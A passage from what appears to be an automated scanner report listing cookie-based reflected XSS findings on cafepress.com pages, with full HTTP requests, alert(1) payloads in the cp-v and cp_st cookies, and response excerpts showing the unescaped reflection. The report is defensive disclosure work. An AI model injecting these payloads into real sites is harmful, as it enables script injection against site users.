Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=56c87</script><script>alert(1)</script>eb1ed059733; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 59367
Date: Sun, 26 Dec 2010 13:48:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '56c87</script><script>alert(1)</script>eb1ed059733'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.28. http://www.cafepress.com/+coasters [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+coasters

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d05a"-alert(1)-"a640bcdbb5e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59298
Date: Sun, 26 Dec 2010 13:48:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.29. http://www.cafepress.com/+coasters [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+coasters

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks (the window.cafepress.tealeaf.searchTerm assignment in the response below). The payload 47b5e</script><script>alert(1)</script>c56a41dcd4d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. Note that the payload does not break out of the quoted string at all: the HTML parser ends a script element at the first </script> it meets regardless of JavaScript string state, so the payload closes the original block and opens a new one containing alert(1). Escaping only quotation marks would therefore not have prevented this.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Two details in this report weaken that mitigation, however: the responses set the application's cookies with domain=cafepress.com, so script running on any host under that domain can plant a cp_st or cp-v value that www.cafepress.com will then echo, and the site is served over plain HTTP, so an on-path attacker can inject a Set-Cookie header directly.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=47b5e</script><script>alert(1)</script>c56a41dcd4d; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59305
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '47b5e</script><script>alert(1)</script>c56a41dcd4d'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+eat_sleep_game_light_tshirt,299007536

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks (the s.eVar30 assignment in the response below). The payload bbfc3"-alert(1)-"de6154bb2da was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. The leading double quote closes the string, -alert(1)- is then evaluated as part of a subtraction expression, and the trailing quote reopens a string so the statement remains syntactically valid and executes on page load.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 93266
Date: Sun, 26 Dec 2010 13:49:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+eat_sleep_game_light_tshirt,299007536

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58edd</script><script>alert(1)</script>b17bfa61193 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=58edd</script><script>alert(1)</script>b17bfa61193; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 93292
Date: Sun, 26 Dec 2010 13:49:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'ProductDetails'
window.cafepress.tealeaf.searchTerm = '58edd</script><script>alert(1)</script>b17bfa61193'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+framed-prints

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4dfd"-alert(1)-"012c3a7120a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 